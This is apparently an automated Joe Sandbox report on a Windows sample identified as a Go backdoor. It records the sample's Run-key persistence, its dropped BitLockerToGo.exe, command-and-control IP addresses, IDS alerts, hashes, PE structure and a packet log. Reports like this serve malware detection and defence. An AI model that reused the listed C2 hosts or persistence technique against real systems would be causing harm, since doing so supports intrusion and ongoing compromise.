                          http://188.130.206.243BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C098000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3161396313.000000000C200000.00000004.00001000.00020000.00000000.sdmpfalse
                            unknown
                            https://contoso.com/powershell.exe, 00000004.00000002.1584123213.000000000564B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1584123213.000000000564B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://contoso.com/Licensepowershell.exe, 00000004.00000002.1584123213.000000000564B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://contoso.com/Iconpowershell.exe, 00000004.00000002.1584123213.000000000564B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://93.185.159.253BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3161396313.000000000C200000.00000004.00001000.00020000.00000000.sdmpfalse
                              unknown
                              http://46.8.236.61BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3161396313.000000000C200000.00000004.00001000.00020000.00000000.sdmpfalse
                                unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1577671729.00000000045E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1577671729.0000000004736000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1576982085.0000000002509000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://91.212.166.91BitLockerToGo.exe, 00000002.00000002.3158908569.000000000C096000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.3161396313.000000000C200000.00000004.00001000.00020000.00000000.sdmpfalse
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    46.8.232.106
                                    unknownRussian Federation
                                    28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                                    188.130.206.243
                                    unknownRussian Federation
                                    200509SVINT-ASNESfalse
                                    93.185.159.253
                                    unknownRussian Federation
                                    39912I3B-ASATfalse
                                    91.212.166.91
                                    unknownUnited Kingdom
                                    35819MOBILY-ASEtihadEtisalatCompanyMobilySAfalse
                                    109.172.88.38
                                    unknownRussian Federation
                                    41691SUMTEL-AS-RIPEMoscowRussiaRUtrue
                                    46.8.236.61
                                    unknownRussian Federation
                                    28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1537033
                                    Start date and time:2024-10-18 14:08:33 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 14s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Run name:Run with higher sleep bypass
                                    Number of analysed new started processes analysed:10
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:BwqqVoHR71.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:0a21a94198f6157abb36bf55cb43be27.exe
                                    Detection:MAL
                                    Classification:mal72.troj.evad.winEXE@7/4@0/6
                                    EGA Information:Failed
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target BitLockerToGo.exe, PID 7660 because there are no executed function
                                    • Execution Graph export aborted for target BwqqVoHR71.exe, PID 8164 because there are no executed function
                                    • Execution Graph export aborted for target powershell.exe, PID 5908 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • VT rate limit hit for: BwqqVoHR71.exe
                                    TimeTypeDescription
                                    14:09:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run App C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                    14:10:00AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run App C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    46.8.232.106sV9ElC4fU4.exeGet hashmaliciousGO BackdoorBrowse
                                    • 46.8.232.106/
                                    antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                    • 46.8.232.106/
                                    antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                    • 46.8.232.106/
                                    wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                    • 46.8.232.106/
                                    wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                    • 46.8.232.106/
                                    5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                    • 46.8.232.106/
                                    5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                    • 46.8.232.106/
                                    GoogleInstaller.exeGet hashmaliciousGO BackdoorBrowse
                                    • 46.8.232.106/
                                    GoogleInstaller.exeGet hashmaliciousGO BackdoorBrowse
                                    • 46.8.232.106/
                                    188.130.206.243antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                    • 188.130.206.243/
                                    93.185.159.253sV9ElC4fU4.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253/
                                    antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253/
                                    antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253/
                                    wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253/
                                    wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253/
                                    5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253/
                                    5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253/
                                    GoogleInstaller.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253/
                                    No context
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    SVINT-ASNESantispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                    • 188.130.206.243
                                    na.elfGet hashmaliciousMirai, MoobotBrowse
                                    • 188.130.200.140
                                    FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsSecuriteInfo.com.Win32.PWSX-gen.31473.14481.exeGet hashmaliciousStealc, VidarBrowse
                                    • 46.8.231.109
                                    NmN91TzzQT.exeGet hashmaliciousStealc, VidarBrowse
                                    • 46.8.231.109
                                    mD9WPbCEgK.exeGet hashmaliciousStealc, VidarBrowse
                                    • 46.8.231.109
                                    sV9ElC4fU4.exeGet hashmaliciousGO BackdoorBrowse
                                    • 46.8.236.61
                                    antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                    • 46.8.236.61
                                    antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                    • 46.8.236.61
                                    wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                    • 46.8.236.61
                                    wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                    • 46.8.236.61
                                    2efOvyn28p.exeGet hashmaliciousStealc, VidarBrowse
                                    • 46.8.231.109
                                    MOBILY-ASEtihadEtisalatCompanyMobilySAn5h5BaL8q0.exeGet hashmaliciousSality, XWormBrowse
                                    • 46.44.87.100
                                    arm5.elfGet hashmaliciousMiraiBrowse
                                    • 37.243.118.61
                                    arm6.elfGet hashmaliciousUnknownBrowse
                                    • 37.243.118.25
                                    mips.elfGet hashmaliciousMiraiBrowse
                                    • 178.81.128.81
                                    sparc.elfGet hashmaliciousMiraiBrowse
                                    • 178.81.128.55
                                    m68k.elfGet hashmaliciousUnknownBrowse
                                    • 5.110.196.213
                                    na.elfGet hashmaliciousMiraiBrowse
                                    • 5.108.208.202
                                    na.elfGet hashmaliciousMiraiBrowse
                                    • 176.224.147.87
                                    na.elfGet hashmaliciousMiraiBrowse
                                    • 178.81.128.75
                                    I3B-ASATbotnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                    • 78.142.85.12
                                    sV9ElC4fU4.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253
                                    antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253
                                    antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253
                                    wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253
                                    wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253
                                    3wtD2jXnxy.exeGet hashmaliciousRedLine, STRRATBrowse
                                    • 93.185.156.125
                                    5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253
                                    5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253
                                    No context
                                    No context
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1264
                                    Entropy (8bit):5.367050635458706
                                    Encrypted:false
                                    SSDEEP:24:3FnWSKco4KmBs4RPT6BmFoUebIlmjKcmZ9tXt/NK3R8O9r/:pWSU4y4RQmFoUeUmfmZ9tlNWR8GT
                                    MD5:30EF126281FA5B79F89AD7367CAF1E35
                                    SHA1:26B14F428AD37A812F1134155A49E51F3830CBD4
                                    SHA-256:47BB6B31CBF6BAF6754C2A359485AC75BCF6C9FA427372CF62A02B6EE5306884
                                    SHA-512:1E84DE9A8B8285016D10992E4E030C9C9EE503975C01852C68B3121437491F529CE114FE63601171A12D9BE113243E9A4C01FBD2F8F6278BE975DBAF8CAEBDB4
                                    Malicious:false
                                    Reputation:low
                                    Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):416
                                    Entropy (8bit):6.290442194664285
                                    Encrypted:false
                                    SSDEEP:12:P2A1UGxFeTAyfgbIvl6EdwyX3g8v7RlCy+S0:Pv2GHe8yfMYlXQK7Rk40
                                    MD5:53F36EDE81D78D39A69ABBDBB454D634
                                    SHA1:D902E8664B0B9136EB667B91A773E721B8F48827
                                    SHA-256:B4F67571FD899C51249437FEAB69736B0D6C496412B2F2B9B3BA50ECC6F1C82B
                                    SHA-512:D6245D3F53E981CD67C07D8743830E49B895415F863B4CDF7174087047F242BEDC41BBE02A8F7378B9A7F499BF4F465ACBAC6DF25A76EBD841AD0A732F89222E
                                    Malicious:false
                                    Preview:...>../Y.*;=."..S.&#A.. LY+.].6<XW..M_-.Q.9]@...Q]..ZQ/^\< *MW]<X1).^..UU8.2E&.-.2\......W.....2Y...F.7.A..SW)X._,.(@5.5[..'G=.*\#.^P.6V_6'-@![,U .1X6..B..7."\..6Z..01".+$5S...A...L.-.P...],.(M.4.X$2.V.-WV...G...__.#V).^PT..@ .=Q'>!\.Z-])..O8^Q..*....!...)...%TS.4L6.1F5..W_..R9].G2+.\...R?6#[.TX@?Z.R..4_Q-'X+..M...P3-._.=7O.+<.S,!.4X...Y3....T_.SL-ZWF_5._'..[(]1Q.Q.@R..RW\.Z.U?^*..M.X.[...^'.5U)[.G.:.\1.>W.Y<Z_[#
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.3085429709464504
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:BwqqVoHR71.exe
                                    File size:19'172'088 bytes
                                    MD5:0a21a94198f6157abb36bf55cb43be27
                                    SHA1:9a01b5e8a68be2b49250c730f8c3ecaee3734170
                                    SHA256:53fcb9786b102a6ad732878445deb13132324e59487ac841cba4e38bb990bee6
                                    SHA512:a09ed0c8e69a4f399b4c747d1b0565693caf64a0e7785ea55efd31819d638f3f84d626bdb7607dcf9338785a403f88b72c7566c532a56f2b6ded0d5c77d80fa1
                                    SSDEEP:196608:haiDgib6rJD1c/naBrlHmD0Aol3MM146sy3sjXsJrtTCZiL:p6D1UaVkDxQ4BmtZ
                                    TLSH:7917AE10FA9B40F1ED034971919BB26F63346E058B25CBDBEB957B2EFC376920876205
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........~"...............M.........@........`....@..........................P)......:%...@................................
                                    Icon Hash:833961634951097f
                                    Entrypoint:0x471c40
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:6
                                    OS Version Minor:1
                                    File Version Major:6
                                    File Version Minor:1
                                    Subsystem Version Major:6
                                    Subsystem Version Minor:1
                                    Import Hash:4f2f006e2ecf7172ad368f8289dc96c1
                                    Signature Valid:false
                                    Signature Issuer:CN=Certum Extended Validation Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
                                    Signature Validation Error:A certificate was explicitly revoked by its issuer
                                    Error Number:-2146762484
                                    Not Before, Not After
                                    • 09/09/2024 05:06:13 09/09/2025 05:06:12
                                    Subject Chain
                                    • CN="Guizhou Sixuanda Technology Co., Ltd.", O="Guizhou Sixuanda Technology Co., Ltd.", L=Guiyang, S=Guizhou, C=CN, SERIALNUMBER=91520100MA6DNNXK11, OID.1.3.6.1.4.1.311.60.2.1.1=Guiyang, OID.1.3.6.1.4.1.311.60.2.1.2=Guizhou, OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization
                                    Version:3
                                    Thumbprint MD5:62A1343435FC5131E11FA8C871BB3A1B
                                    Thumbprint SHA-1:A3AFF46C5F8E2A1F750C570698B864E75553E61F
                                    Thumbprint SHA-256:87D45B86DFCC84C5EF8338026C26F34935DBAA383A7DD583F48675AF77C957A4
                                    Serial:332576FE101609502C23F70055B4A3BE
                                    Instruction
                                    jmp 00007FB819447FF0h
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    sub esp, 28h
                                    mov dword ptr [esp+1Ch], ebx
                                    mov dword ptr [esp+10h], ebp
                                    mov dword ptr [esp+14h], esi
                                    mov dword ptr [esp+18h], edi
                                    mov dword ptr [esp], eax
                                    mov dword ptr [esp+04h], ecx
                                    call 00007FB81942C2F6h
                                    mov eax, dword ptr [esp+08h]
                                    mov edi, dword ptr [esp+18h]
                                    mov esi, dword ptr [esp+14h]
                                    mov ebp, dword ptr [esp+10h]
                                    mov ebx, dword ptr [esp+1Ch]
                                    add esp, 28h
                                    retn 0004h
                                    ret
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    sub esp, 08h
                                    mov ecx, dword ptr [esp+0Ch]
                                    mov edx, dword ptr [ecx]
                                    mov eax, esp
                                    mov dword ptr [edx+04h], eax
                                    sub eax, 00010000h
                                    mov dword ptr [edx], eax
                                    add eax, 00000BA0h
                                    mov dword ptr [edx+08h], eax
                                    mov dword ptr [edx+0Ch], eax
                                    lea edi, dword ptr [ecx+34h]
                                    mov dword ptr [edx+18h], ecx
                                    mov dword ptr [edi], edx
                                    mov dword ptr [esp+04h], edi
                                    call 00007FB81944A454h
                                    cld
                                    call 00007FB8194494DEh
                                    call 00007FB819448119h
                                    add esp, 08h
                                    ret
                                    jmp 00007FB81944A300h
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    mov ebx, dword ptr [esp+04h]
                                    mov ebp, esp
                                    mov dword ptr fs:[00000034h], 00000000h
                                    mov ecx, dword ptr [ebx+04h]
                                    cmp ecx, 00000000h
                                    je 00007FB81944A301h
                                    mov eax, ecx
                                    shl eax, 02h
                                    sub esp, eax
                                    mov edi, esp
                                    mov esi, dword ptr [ebx+08h]
                                    cld
                                    rep movsd
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x122d0000x45e.idata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x12760000x1e0d8.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x12462000x28f8.reloc
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x122e0000x46ac8.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x1166e000xb8.data
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x4dc9680x4dca00f482a2ef2cb5edb87b98c38afb691406unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x4de0000xc87c4c0xc87e00fb37f6883da54d37c8d09448d61f3fe6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x11660000xc6ea00x7c0007c710d50a908c7f6ab3014874330232bFalse0.27440618699596775data5.963241990946737IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .idata0x122d0000x45e0x600cd66f39cc4398db79c4b9999994e1d88False0.3626302083333333data4.068932523700792IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .reloc0x122e0000x46ac80x46c001516e6d890589227101e0ac3356c7e25False0.5061354350706714data6.6069875234777795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    .symtab0x12750000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    .rsrc0x12760000x1e0d80x1e200db3853b5e9f878d7b090889cc5c58937False0.267083765560166data3.7343061086588305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x12762a40x4524PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9666101694915255
                                    RT_ICON0x127a7c80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.10524370046137466
                                    RT_ICON0x128aff00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.1844000944733113
                                    RT_ICON0x128f2180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.24180497925311203
                                    RT_ICON0x12917c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.29338649155722324
                                    RT_ICON0x12928680x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.3762295081967213
                                    RT_ICON0x12931f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.44680851063829785
                                    RT_GROUP_ICON0x12936580x68data0.7596153846153846
                                    RT_VERSION0x12936c00x4b8COM executable for DOSEnglishUnited States0.29387417218543044
                                    RT_MANIFEST0x1293b780x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093
                                    DLLImport
                                    kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler
                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States
                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-10-18T14:10:38.691574+02002855539ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M21109.172.88.3823961192.168.2.1049988TCP
                                    2024-10-18T14:10:38.691903+02002855536ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M11192.168.2.1049988109.172.88.3823961TCP
                                    2024-10-18T14:11:07.929703+02002855537ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M21192.168.2.1049988109.172.88.3823961TCP
                                    2024-10-18T14:11:08.196218+02002855538ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M11109.172.88.3823961192.168.2.1049988TCP
                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 18, 2024 14:09:58.817867041 CEST4986580192.168.2.1046.8.232.106
                                    Oct 18, 2024 14:09:58.822654009 CEST804986546.8.232.106192.168.2.10
                                    Oct 18, 2024 14:09:58.823391914 CEST4986580192.168.2.1046.8.232.106
                                    Oct 18, 2024 14:09:58.824002028 CEST4986580192.168.2.1046.8.232.106
                                    Oct 18, 2024 14:09:58.828721046 CEST804986546.8.232.106192.168.2.10
                                    Oct 18, 2024 14:09:59.688499928 CEST804986546.8.232.106192.168.2.10
                                    Oct 18, 2024 14:09:59.690706015 CEST4987180192.168.2.1046.8.236.61
                                    Oct 18, 2024 14:09:59.695553064 CEST804987146.8.236.61192.168.2.10
                                    Oct 18, 2024 14:09:59.696419954 CEST4987180192.168.2.1046.8.236.61
                                    Oct 18, 2024 14:09:59.696902990 CEST4987180192.168.2.1046.8.236.61
                                    Oct 18, 2024 14:09:59.701785088 CEST804987146.8.236.61192.168.2.10
                                    Oct 18, 2024 14:09:59.729008913 CEST4986580192.168.2.1046.8.232.106
                                    Oct 18, 2024 14:10:00.547857046 CEST804987146.8.236.61192.168.2.10
                                    Oct 18, 2024 14:10:00.550116062 CEST4987780192.168.2.1093.185.159.253
                                    Oct 18, 2024 14:10:00.555258989 CEST804987793.185.159.253192.168.2.10
                                    Oct 18, 2024 14:10:00.556850910 CEST4987780192.168.2.1093.185.159.253
                                    Oct 18, 2024 14:10:00.557034016 CEST4987780192.168.2.1093.185.159.253
                                    Oct 18, 2024 14:10:00.561924934 CEST804987793.185.159.253192.168.2.10
                                    Oct 18, 2024 14:10:00.604710102 CEST4987180192.168.2.1046.8.236.61
                                    Oct 18, 2024 14:10:01.431174994 CEST804987793.185.159.253192.168.2.10
                                    Oct 18, 2024 14:10:01.433644056 CEST4988380192.168.2.1091.212.166.91
                                    Oct 18, 2024 14:10:01.438796997 CEST804988391.212.166.91192.168.2.10
                                    Oct 18, 2024 14:10:01.438922882 CEST4988380192.168.2.1091.212.166.91
                                    Oct 18, 2024 14:10:01.439162016 CEST4988380192.168.2.1091.212.166.91
                                    Oct 18, 2024 14:10:01.444031954 CEST804988391.212.166.91192.168.2.10
                                    Oct 18, 2024 14:10:01.486428976 CEST4987780192.168.2.1093.185.159.253
                                    Oct 18, 2024 14:10:02.354288101 CEST804988391.212.166.91192.168.2.10
                                    Oct 18, 2024 14:10:02.355767965 CEST4988980192.168.2.10188.130.206.243
                                    Oct 18, 2024 14:10:02.360663891 CEST8049889188.130.206.243192.168.2.10
                                    Oct 18, 2024 14:10:02.360737085 CEST4988980192.168.2.10188.130.206.243
                                    Oct 18, 2024 14:10:02.360979080 CEST4988980192.168.2.10188.130.206.243
                                    Oct 18, 2024 14:10:02.365979910 CEST8049889188.130.206.243192.168.2.10
                                    Oct 18, 2024 14:10:02.408427954 CEST4988380192.168.2.1091.212.166.91
                                    Oct 18, 2024 14:10:03.221941948 CEST8049889188.130.206.243192.168.2.10
                                    Oct 18, 2024 14:10:03.222166061 CEST4988980192.168.2.10188.130.206.243
                                    Oct 18, 2024 14:10:03.222228050 CEST4988380192.168.2.1091.212.166.91
                                    Oct 18, 2024 14:10:03.222254992 CEST4987780192.168.2.1093.185.159.253
                                    Oct 18, 2024 14:10:03.222287893 CEST4987180192.168.2.1046.8.236.61
                                    Oct 18, 2024 14:10:03.222311020 CEST4986580192.168.2.1046.8.232.106
                                    Oct 18, 2024 14:10:03.227293015 CEST8049889188.130.206.243192.168.2.10
                                    Oct 18, 2024 14:10:03.227406025 CEST4988980192.168.2.10188.130.206.243
                                    Oct 18, 2024 14:10:03.228040934 CEST804988391.212.166.91192.168.2.10
                                    Oct 18, 2024 14:10:03.228055000 CEST804987793.185.159.253192.168.2.10
                                    Oct 18, 2024 14:10:03.228065968 CEST804987146.8.236.61192.168.2.10
                                    Oct 18, 2024 14:10:03.228076935 CEST804986546.8.232.106192.168.2.10
                                    Oct 18, 2024 14:10:03.228110075 CEST4988380192.168.2.1091.212.166.91
                                    Oct 18, 2024 14:10:03.228120089 CEST4987780192.168.2.1093.185.159.253
